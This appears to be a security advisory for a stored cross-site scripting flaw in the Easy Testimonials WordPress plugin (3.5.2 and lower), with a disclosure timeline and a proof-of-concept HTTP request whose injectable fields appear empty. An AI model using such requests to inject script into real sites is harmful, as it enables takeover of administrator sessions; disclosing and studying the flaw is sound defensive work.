Easy Testimonials < 3.6 - Authenticated Stored Cross-Site Scripting (XSS)

Multiple cross-site scripting vulnerabilities in Easy Testimonials 3.5.2 and lower allow remote attackers to inject arbitrary web script or HTML via the Client Name, Position / Web Address / Other, Location Reviewed / Product Reviewed / Item Reviewed, Rating parameter. Successful exploitation of this vulnerability would allow an authenticated medium-privileged user (contributor+) to inject arbitrary javascript code which is executed when admin and other users access the All Testimonials page in the backend. Furthermore, if the ‘Allow HTML Tags in Testimonials’ option is enabled (which is the default), the XSS will also be triggered when the testimonial is displayed in the frontend. Timeline (WPScanTeam) May 9th, 2020 - Confirmed & Escalated to WP Plugins Team May 11th, 2020 - WP Plugins Team Investigating May 12th, 2020 - v3.6 released, fixing the issue

PoC

POST /wp-admin/post.php?post=176&action;=edit&meta-box-loader;=1&meta-box-loader-nonce;=ee114d2173&_locale=user HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: application/json, /;q=0.1 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://example.com/wp-admin/post.php?post=176&amp;action;=edit X-WP-Nonce: c12330b50c Content-Type: multipart/form-data; boundary=---------------------------1097171016543246544154165286 Origin: http://example.com Content-Length: 2729 DNT: 1 Connection: close Cookie: wordpress_58dc4566418ddfdf24cf6b5640426bf6=author%7C1590119950%7CtpD9AZlWj2uRqbtzvtTcMWUew7TWWTqfj418mh5o1tr%7Ce020133190b2d0d55659fc79576f7341774c77f301b6096023e70f294549d103; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_58dc4566418ddfdf24cf6b5640426bf6=author%7C1590119950%7CtpD9AZlWj2uRqbtzvtTcMWUew7TWWTqfj418mh5o1tr%7C8642c6873c0009beb211174d3e93ed720f7d9826d71438fc48ac16ea7e999a66; wp-settings-3=libraryContent%3Dbrowse%26urlbutton%3Dnone%26posts_list_mode%3Dexcerpt; wp-settings-time-3=1588910767 -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name=“_wpnonce” c627da8fa4 -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name=“_wp_http_referer” /wordpress/wp-admin/post.php?post=176&action;=edit -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name=“user_ID” 3 -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name=“action” editpost -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name=“originalaction” editpost -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name=“post_type” testimonial -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name=“original_post_status” publish -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name=“referredby” http://example.com/testimonial/alerttitle/ -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name=“_wp_original_http_referer” http://example.com/testimonial/alerttitle/ -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name=“post_ID” 176 -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name=“meta-box-order-nonce” e78bbacfea -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name=“closedpostboxesnonce” cb99c6138d -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name=“samplepermalinknonce” 97e0ac6960 -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name=“my-custom-fields_wpnonce” f842632466 -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name=“_ikcf_client” -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name=“_ikcf_email” [email protected] -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name=“_ikcf_position” -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name=“_ikcf_other” -----------------------------1097171016543246544154165286 Content-Disposition: form-data; name=“_ikcf_rating” -----------------------------1097171016543246544154165286-- #XSS TRIGGER POINT: When an admin or authenticate user load contents of all testimonials.